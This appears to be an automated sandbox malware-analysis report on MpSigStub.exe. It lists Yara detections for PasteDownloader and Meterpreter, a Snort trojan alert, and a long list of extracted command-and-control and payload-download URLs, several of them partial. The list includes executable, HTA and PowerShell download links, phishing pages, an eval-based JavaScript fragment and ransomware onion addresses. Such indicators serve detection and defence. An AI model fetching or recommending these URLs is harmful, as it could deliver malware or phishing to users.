Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582B030 FindNextFileW,FindClose,FindFirstFileW,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5852504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

Networking:

Yara detected PasteDownloader

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Meterpreter

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49788 -> 178.32.63.50:80

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: septnet.duckdns.org

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin
Source: Malware configuration extractor	URLs: http://download.enet.com.cn/search.php?keyword=%s
Source: Malware configuration extractor	URLs: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: Malware configuration extractor	URLs: http://ow.ly/QoHbJ
Source: Malware configuration extractor	URLs: http://santasalete.sp.gov.br/jss/
Source: Malware configuration extractor	URLs: http://www.redirserver.com/update4.cfm?tid=&cn_id=
Source: Malware configuration extractor	URLs: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: Malware configuration extractor	URLs: http://www.youndoo.com/?z=
Source: Malware configuration extractor	URLs: http://%s%simg.jpg
Source: Malware configuration extractor	URLs: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: Malware configuration extractor	URLs: http://vod.7ibt.com/index.php?url=
Source: Malware configuration extractor	URLs: http://microhelptech.com/gotoassist/
Source: Malware configuration extractor	URLs: http://malikberry.com/files101/htamandela.hta
Source: Malware configuration extractor	URLs: http://%domain%/update.php
Source: Malware configuration extractor	URLs: http://d.sogou.com/music.so?query=%s
Source: Malware configuration extractor	URLs: http://%s:%d/%s%d%08d
Source: Malware configuration extractor	URLs: http://%s:%i%s?mod=cmd
Source: Malware configuration extractor	URLs: http://pages
Source: Malware configuration extractor	URLs: http://www.zxboy.com#http://
Source: Malware configuration extractor	URLs: http://p.zhongsou.com/p?w=%s
Source: Malware configuration extractor	URLs: http://88888888.7766.org/ExeIni
Source: Malware configuration extractor	URLs: http://update.7h4uk.com:443/antivirus.php
Source: Malware configuration extractor	URLs: http://23.95.122.25/..-.-................-.....-------------/..............................................................................................dot"targetmode="external"/></relationships>
Source: Malware configuration extractor	URLs: http://flash.chinaren.com/ip/ip.php
Source: Malware configuration extractor	URLs: http://jump.qq.com/clienturl_15
Source: Malware configuration extractor	URLs: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: Malware configuration extractor	URLs: http://www.piram.com.br/hosts.txt
Source: Malware configuration extractor	URLs: http://www.now.cn/?SCPMCID=
Source: Malware configuration extractor	URLs: http://110.42.4.180:
Source: Malware configuration extractor	URLs: http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s
Source: Malware configuration extractor	URLs: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp
Source: Malware configuration extractor	URLs: http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/
Source: Malware configuration extractor	URLs: http://www.cashon.co.kr/app/app.php?url=
Source: Malware configuration extractor	URLs: http://stats.hosting24.com/count.php
Source: Malware configuration extractor	URLs: http://192.189.25.17/cgbin/ukbros
Source: Malware configuration extractor	URLs: http://pig.zhongsou.com/helpsimple/help.htm
Source: Malware configuration extractor	URLs: http://zsxz.zhongsou.com/route/
Source: Malware configuration extractor	URLs: http://whatami.us.to/tc
Source: Malware configuration extractor	URLs: http://whenyouplaygood.com/s/gate.php?a");f["\x73\x65\x6e\x64"]();eval(f["responsetext"
Source: Malware configuration extractor	URLs: http://23.249.163.163/qwerty.exe
Source: Malware configuration extractor	URLs: http://92.222.7.
Source: Malware configuration extractor	URLs: http://darkside
Source: Malware configuration extractor	URLs: http://so1.5k5.net/interface?action=install&p=
Source: Malware configuration extractor	URLs: http://www.gamedanji.cn/ExeIni
Source: Malware configuration extractor	URLs: http://gosgd.com
Source: Malware configuration extractor	URLs: http://find.verycd.com/folders?cat=movie&kw=%s
Source: Malware configuration extractor	URLs: http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s
Source: Malware configuration extractor	URLs: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: Malware configuration extractor	URLs: http://www.cashon.co.kr/app/uninstall.php?
Source: Malware configuration extractor	URLs: http://www.moliv.com.br/stat/email0702/
Source: Malware configuration extractor	URLs: http://foo.w97.cn/data/file/kwbuf.ini
Source: Malware configuration extractor	URLs: http://chemgioaz.blogspot.com/
Source: Malware configuration extractor	URLs: http://init.icloud-analysis.com
Source: Malware configuration extractor	URLs: http://img.zhongsou.com/i?w=%s
Source: Malware configuration extractor	URLs: http://new.beahh.com/startup.php
Source: Malware configuration extractor	URLs: http://pznjaslo.pl/wp-content/outstanding-invoices/
Source: Malware configuration extractor	URLs: http://instamailserver.link/finito.ps1
Source: Malware configuration extractor	URLs: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: Malware configuration extractor	URLs: http://mp3.baidu.com/m?tn=baidump3lyric&ct=
Source: Malware configuration extractor	URLs: http://3dplayful.blogspot.com/
Source: Malware configuration extractor	URLs: http://stroyprivoz.ru/dokumente-vom-notar/
Source: Malware configuration extractor	URLs: http://a.pomf.cat/
Source: Malware configuration extractor	URLs: http://hotedeals.co.uk/ekck095032/
Source: Malware configuration extractor	URLs: http://www.iask.com/s?k=%s
Source: Malware configuration extractor	URLs: http://vidquick.info/cgi/
Source: Malware configuration extractor	URLs: http://gg
Source: Malware configuration extractor	URLs: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: Malware configuration extractor	URLs: http://search.newhua.com/search.asp?Keyword=%s
Source: Malware configuration extractor	URLs: http://(www\|corail)\\.sudoc
Source: Malware configuration extractor	URLs: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: Malware configuration extractor	URLs: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: Malware configuration extractor	URLs: http://mp3.zhongsou.com/m?w=%s
Source: Malware configuration extractor	URLs: http://yc.book.sohu.com/series_list.php?select=1&text=%s
Source: Malware configuration extractor	URLs: http://kremlin-malwrhunterteam.info/scan.exe
Source: Malware configuration extractor	URLs: http://8nasrcity.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.preyer.it/ups.com/
Source: Malware configuration extractor	URLs: http://bittupadam.blogspot.com/
Source: Malware configuration extractor	URLs: http://search.btchina.net/search.php?query=%s
Source: Malware configuration extractor	URLs: http://www.bluelook.es/bvvtbbh.php
Source: Malware configuration extractor	URLs: http://articlunik.blogspot.com/
Source: Malware configuration extractor	URLs: http://localhost:62338/Chipsetsync.asmx
Source: Malware configuration extractor	URLs: http://www.microsoft.com0
Source: Malware configuration extractor	URLs: http://%20%20@j.mp/as
Source: Malware configuration extractor	URLs: http://ys.cn.yahoo.com/mohu/index.html?p=%s
Source: Malware configuration extractor	URLs: http://coltaddict.blogspot.com/
Source: Malware configuration extractor	URLs: http://jump.qq.com/clienturl_100?clientuin=
Source: Malware configuration extractor	URLs: http://www.ip.com.cn/idcard.php?q=%s
Source: Malware configuration extractor	URLs: http://www.thon-samson.be/js/_notes/
Source: Malware configuration extractor	URLs: http://rl.ammyy.com
Source: Malware configuration extractor	URLs: http://fixdoctorsfirst.net/registry/andyfkz.png?bg=sp14
Source: Malware configuration extractor	URLs: http://animefrase.blogspot.com/
Source: Malware configuration extractor	URLs: http://binyousafindustries.com/fonts/jo/mops.exe
Source: Malware configuration extractor	URLs: http://images.google.cn/images?q=%s
Source: Malware configuration extractor	URLs: http://aindonashi.blogspot.com/
Source: Malware configuration extractor	URLs: http://alindaenua.blogspot.com/
Source: Malware configuration extractor	URLs: http://v.iask.com/v?tag=&k=%s
Source: Malware configuration extractor	URLs: http://www.w3.org/1999/xsl/transform
Source: Malware configuration extractor	URLs: http://95.173.183.
Source: Malware configuration extractor	URLs: http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint@truvo.be
Source: Malware configuration extractor	URLs: http://www.cashon.co.kr/search/search.php
Source: Malware configuration extractor	URLs: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: Malware configuration extractor	URLs: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
Source: Malware configuration extractor	URLs: http://vequiato.sites.uol.com.br/
Source: Malware configuration extractor	URLs: http://</t></si><si><t>188.127.231.
Source: Malware configuration extractor	URLs: http://127.0.0.1:20202/remind.html
Source: Malware configuration extractor	URLs: http://92.38.135.46/43cfqysryip51zzq.php
Source: Malware configuration extractor	URLs: http://%s%s
Source: Malware configuration extractor	URLs: http://208.95.104.
Source: Malware configuration extractor	URLs: http://abeidaman.blogspot.com/
Source: Malware configuration extractor	URLs: http://flow4.6299.cc/ClientAPI/flowtaskAPI.aspx
Source: Malware configuration extractor	URLs: http://20vp.cn/moyu/
Source: Malware configuration extractor	URLs: http://www.look2me.com
Source: Malware configuration extractor	URLs: http://www.wosss.com/search.aspx?q=%s
Source: Malware configuration extractor	URLs: http://www.3322.org/dyndns/getip
Source: Malware configuration extractor	URLs: http://www.ip.com.cn/ip.php?q=%s
Source: Malware configuration extractor	URLs: http://81.177.26.20/ayayay
Source: Malware configuration extractor	URLs: http://cvfanatic.blogspot.com/
Source: Malware configuration extractor	URLs: http://best4hack.blogspot.com/
Source: Malware configuration extractor	URLs: http://cicahroti.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.j.mp/
Source: Malware configuration extractor	URLs: http://anomaniez.blogspot.com/
Source: Malware configuration extractor	URLs: http://62.210.214.
Source: Malware configuration extractor	URLs: http://bonkersmen.blogspot.com/
Source: Malware configuration extractor	URLs: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: Malware configuration extractor	URLs: http://search.17173.com/index.jsp?keyword=%s
Source: Malware configuration extractor	URLs: http://www.22teens.com/
Source: Malware configuration extractor	URLs: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: Malware configuration extractor	URLs: http://%s:%i%s
Source: Malware configuration extractor	URLs: http://vidscentral.net/inc/6348852
Source: Malware configuration extractor	URLs: http://download.zhongsou.com/cdsearch/
Source: Malware configuration extractor	URLs: http://babukq4e2p4wu4iq.onion
Source: Malware configuration extractor	URLs: http://aspx.vod38.com/
Source: Malware configuration extractor	URLs: http://200.159.128.
Source: Malware configuration extractor	URLs: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
Source: Malware configuration extractor	URLs: http://www.soso.com/q?w=%s
Source: Malware configuration extractor	URLs: http://kavok.ind.br/ds/2312.gif
Source: Malware configuration extractor	URLs: http://www.tempuri.org/DataSet1.xsd
Source: Malware configuration extractor	URLs: http://batrasiaku.blogspot.com/
Source: Malware configuration extractor	URLs: http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/
Source: Malware configuration extractor	URLs: http://bigboobsp.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.php/?email=kevind@hollywoodwoodwork.com"target="_blank
Source: Malware configuration extractor	URLs: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=
Source: Malware configuration extractor	URLs: http://www.look2me.com/products/
Source: Malware configuration extractor	URLs: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: Malware configuration extractor	URLs: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
Source: Malware configuration extractor	URLs: http://blog.x-row.net/
Source: Malware configuration extractor	URLs: http://ads.8866.org/
Source: Malware configuration extractor	URLs: http://spotdewasa.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.zhongsou.com/kefu/zskf.htm
Source: Malware configuration extractor	URLs: http://bit.ly
Source: Malware configuration extractor	URLs: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
Source: Malware configuration extractor	URLs: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
Source: Malware configuration extractor	URLs: http://31.192.210.
Source: Malware configuration extractor	URLs: http://www.daybt.com/query.asp?q=%s
Source: Malware configuration extractor	URLs: http://3117488091/lib/jquery-3.2.1.min.js
Source: Malware configuration extractor	URLs: http://funsiteshere.com/redir.php
Source: Malware configuration extractor	URLs: http://pic.sogou.com/pics?query=%s
Source: Malware configuration extractor	URLs: http://softthrifty.com/security.jsp
Source: Malware configuration extractor	URLs: http://www.tq121.com.cn/
Source: Malware configuration extractor	URLs: http://dialup.carpediem.fr/perl/dialup.pl
Source: Malware configuration extractor	URLs: http://z1.nf-2.net/512.txt
Source: Malware configuration extractor	URLs: http://alhalm-now.blogspot.com/
Source: Malware configuration extractor	URLs: http://31.192.209.
Source: Malware configuration extractor	URLs: http://94.102.14.
Source: Malware configuration extractor	URLs: http://aolopdephn.blogspot.com/
Source: Malware configuration extractor	URLs: http://50.63.128.
Source: Malware configuration extractor	URLs: http://dontkillme/
Source: Malware configuration extractor	URLs: http://agressor58.blogspot.com/
Source: Malware configuration extractor	URLs: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: Malware configuration extractor	URLs: http://gosgd2.com
Source: Malware configuration extractor	URLs: http://musah.info/
Source: Malware configuration extractor	URLs: http://berkah2013.blogspot.com/
Source: Malware configuration extractor	URLs: http://wevx.xyz/post.php?uid=
Source: Malware configuration extractor	URLs: http://search.union.yahoo.com.cn/click/search.htm?m=
Source: Malware configuration extractor	URLs: http://search.games.sina.com.cn/cgi-bin/game_search/game_deal.cgi?keywords=%s
Source: Malware configuration extractor	URLs: http://www.sagawa-exp.co.jp/
Source: Malware configuration extractor	URLs: http://www.look2me.com/cgi
Source: Malware configuration extractor	URLs: http://lo0oading.blogspot.com/
Source: Malware configuration extractor	URLs: http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e
Source: Malware configuration extractor	URLs: http://61.19.253.
Source: Malware configuration extractor	URLs: http://www.klikspaandelft.nl/
Source: Malware configuration extractor	URLs: http://xn--
Source: Malware configuration extractor	URLs: http://www.trotux.com/?z=
Source: Malware configuration extractor	URLs: http://arifkacip.blogspot.com/
Source: Malware configuration extractor	URLs: http://clients.lb1networks.com/upd.php?
Source: Malware configuration extractor	URLs: http://html.hjsm.tom.com/?mod=book&act=anonsearch&key=%s
Source: Malware configuration extractor	URLs: http://go.58.com/?f=
Source: Malware configuration extractor	URLs: http://aspx.qqus.net/wanmei/login.asp
Source: Malware configuration extractor	URLs: http://afkar.today/test_coming.training/w_f/
Source: Malware configuration extractor	URLs: http://www.3000.ws/
Source: Malware configuration extractor	URLs: http://js.pkglayer.com
Source: Malware configuration extractor	URLs: http://p.iask.com/p?k=%s
Source: Malware configuration extractor	URLs: http://hostthenpost.org/uploads/
Source: Malware configuration extractor	URLs: http://www.iciba.com/search?s=%s
Source: Malware configuration extractor	URLs: http://%domain%/config.php
Source: Malware configuration extractor	URLs: http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=
Source: Malware configuration extractor	URLs: http://rapidshare.com/files/
Source: Malware configuration extractor	URLs: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: Malware configuration extractor	URLs: http://www.baidu.com/baidu?tn=
Source: Malware configuration extractor	URLs: http://%s/%s/?m=e&p1=%s&p2=%s&p3=%s
Source: Malware configuration extractor	URLs: http://www.sogou.com/web?query=%s
Source: Malware configuration extractor	URLs: http://www.sacbarao.kinghost.net/
Source: Malware configuration extractor	URLs: http://www.2345.com
Source: Malware configuration extractor	URLs: http://203.199.200.61
Source: Malware configuration extractor	URLs: http://music.cn.yahoo.com/lyric.html?p=%s
Source: Malware configuration extractor	URLs: http://ahmad-roni.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.inet4you.com/exit/
Source: Malware configuration extractor	URLs: http://185.153.198.216:8010/UserService
Source: Malware configuration extractor	URLs: http://search.crsky.com/search.asp?sType=ResName&keyword=%s
Source: Malware configuration extractor	URLs: http://www.google.cn/search?q=%s
Source: Malware configuration extractor	URLs: http://games.enet.com.cn/article/SearchCategory.php?key=%s
Source: Malware configuration extractor	URLs: http://citw-vol2.blogspot.com/
Source: Malware configuration extractor	URLs: http://ks.pcgames.com.cn/games_index.jsp?q=%s
Source: Malware configuration extractor	URLs: http://music.soso.com/q?sc=mus&w=%s
Source: Malware configuration extractor	URLs: http://ksn.a
Source: Malware configuration extractor	URLs: http://webpatch.ragnarok.co.kr/
Source: Malware configuration extractor	URLs: http://2010-kpss.blogspot.com/
Source: Malware configuration extractor	URLs: http://image.soso.com/image.cgi?w=%s
Source: Malware configuration extractor	URLs: http://cbl.toolbar4free.com/cgi-bin/s.exe
Source: Malware configuration extractor	URLs: http://aitimatafb.blogspot.com/
Source: Malware configuration extractor	URLs: http://61.160.222.11:
Source: Malware configuration extractor	URLs: http://mp3.baidu.com/m?tn=
Source: Malware configuration extractor	URLs: http://%s/ftp/g.php
Source: Malware configuration extractor	URLs: http://weather.265.com/%s
Source: Malware configuration extractor	URLs: http://toolbar.deepdo.com/download/
Source: Malware configuration extractor	URLs: http://888888.2288.org/Monitor_INI
Source: Malware configuration extractor	URLs: http://%s/any2/%s-direct.ex
Source: Malware configuration extractor	URLs: http://www.ip.com.cn/mobile.php?q=%s
Source: Malware configuration extractor	URLs: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&level=%d&gold=%d&stone=%d&cpname
Source: Malware configuration extractor	URLs: http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&dyfm=ywx2yxjvx3zlbgfzy29adndylmnvbq==&dyfm=cpjyicit
Source: Malware configuration extractor	URLs: http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/
Source: Malware configuration extractor	URLs: http://www.qq994455.com/
Source: Malware configuration extractor	URLs: http://%s
Source: Malware configuration extractor	URLs: http://www.ip.com.cn/tel.php?q=%s
Source: Malware configuration extractor	URLs: http://community.derbiz.com/
Source: Malware configuration extractor	URLs: http://31.192.211.
Source: Malware configuration extractor	URLs: http://"+hashdate().tostring(16)+".eu/script.html
Source: Malware configuration extractor	URLs: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&i=1a3a1a
Source: Malware configuration extractor	URLs: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
Source: Malware configuration extractor	URLs: http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/
Source: Malware configuration extractor	URLs: http://fateh.aba.ae/xyzx.zip
Source: Malware configuration extractor	URLs: http://www.ip138.com
Source: Malware configuration extractor	URLs: http://gaigoixxx.blogspot.com/
Source: Malware configuration extractor	URLs: http://batysnewskz.kz/ups.com
Source: Malware configuration extractor	URLs: http://104.236.94.
Source: Malware configuration extractor	URLs: http://70.38.40.185
Source: Malware configuration extractor	URLs: http://1bestgate.blogspot.com/
Source: Malware configuration extractor	URLs: http://0.82211.net/
Source: Malware configuration extractor	URLs: http://dl.dropbox.com/u/
Source: Malware configuration extractor	URLs: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: Malware configuration extractor	URLs: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiyw
Source: Malware configuration extractor	URLs: http://acayipbiri.blogspot.com/
Source: Malware configuration extractor	URLs: http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/
Source: Malware configuration extractor	URLs: http://fateh.aba.ae/abc.zip
Source: Malware configuration extractor	URLs: http://www.agendagyn.com/media/fotos/2010/
Source: Malware configuration extractor	URLs: http://avnisevinc.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.linkinc.es/scss/water.php
Source: Malware configuration extractor	URLs: http://ip-api.com/
Source: Malware configuration extractor	URLs: http://autothich.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.cashon.co.kr/app/install.php?
Source: Malware configuration extractor	URLs: http://178.79.137.25/campo/
Source: Malware configuration extractor	URLs: http://srmvx.com.br/uploads/
Source: Malware configuration extractor	URLs: http://cert.beahh.com/cert.php
Source: Malware configuration extractor	URLs: http://calleveinte.com.mx/ups-quantum-view
Source: Malware configuration extractor	URLs: http://cs.zhongsou.com/
Source: Malware configuration extractor	URLs: http://foo.w97.cn/SoftInterFace/SearchNum.aspx
Source: Malware configuration extractor	URLs: http://weather.265.com/get_weather.php?action=get_city
Source: Malware configuration extractor	URLs: http://tempuri.org/
Source: Malware configuration extractor	URLs: http://tool.world2.cn/toolbar/
Source: Malware configuration extractor	URLs: http://mitotl.com.mx/ups.com/
Source: Malware configuration extractor	URLs: http://www.yodao.com/search?ue=utf8&q=%s
Source: Malware configuration extractor	URLs: http://%20%20@j.mp/axas
Source: Malware configuration extractor	URLs: http://aancyber77.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
Source: Malware configuration extractor	URLs: http://www.
Source: Malware configuration extractor	URLs: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
Source: Malware configuration extractor	URLs: http://arthisoft.blogspot.com/
Source: Malware configuration extractor	URLs: http://sf3q2wrq34.ddns.net

Found Tor onion address

Show sources

Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: torlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: Qtorlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: Open link in tor browser: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: $https://djdkduep62kz4nzx.onion.to/

Source: Joe Sandbox View

IP Address: 178.32.63.50 178.32.63.50

Source: global traffic

TCP traffic: 192.168.11.20:49790 -> 193.104.197.90:6577

Source: global traffic

HTTP traffic detected: GET /mvbs/Host_hKVPgVgQ234.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache

Source: Joe Sandbox View	ASN Name: TELIANETTeliaCarrierEU TELIANETTeliaCarrierEU
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: HTTP://www.EEEEEEE.EEE
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://%61%63%67%6c%67%6f%61%2e%63%6f%6d/h.js
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://%63%61%39%78%2e%63%6f%6d/ken.gif
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp%C5%E4%D6%C3%D0%C5%CF%A2
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/install.htm?cid=%CID%
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/open.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/run.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/scan.htm?GUID=%GUID%&cid=%CID%x
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/uninstall.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://%HOST%/client/update.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://%d.%d.%d.%d:%d/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://%d.%d.%d.%d:%d/%d/%d/%d/%d/%d/%d/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://%d.%d.%d.%d:3128/
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://%d.ctrl.%s
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://%d.ctrl.%saf
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/config.php
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/content.php?se_id=%d&q=%s&page=%s&ua=%s&al=%s&aff_id=%s&sub_id=%s
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/update.php
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://%domain%/update.phpa
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://%s%simg.jpg
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://%s.com/registerguid.php?guid=
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://%s/?aid=%shttp://%s/sync.php
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://%s/any2/%s-direct.ex
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://%s/any2/%s-direct.exx
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&lang
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&langad
Source: MpSigStub.exe, 00000026.00000003.18332044939.00000138BE4E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/block.phpa
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/buy_online.php
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/buy_online.phpa
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://%s/d1c.dat
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://%s/features.php
Source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp	String found in binary or memory: http://%s/httpss/setup.php?action=4&mk=%s&aid=%s
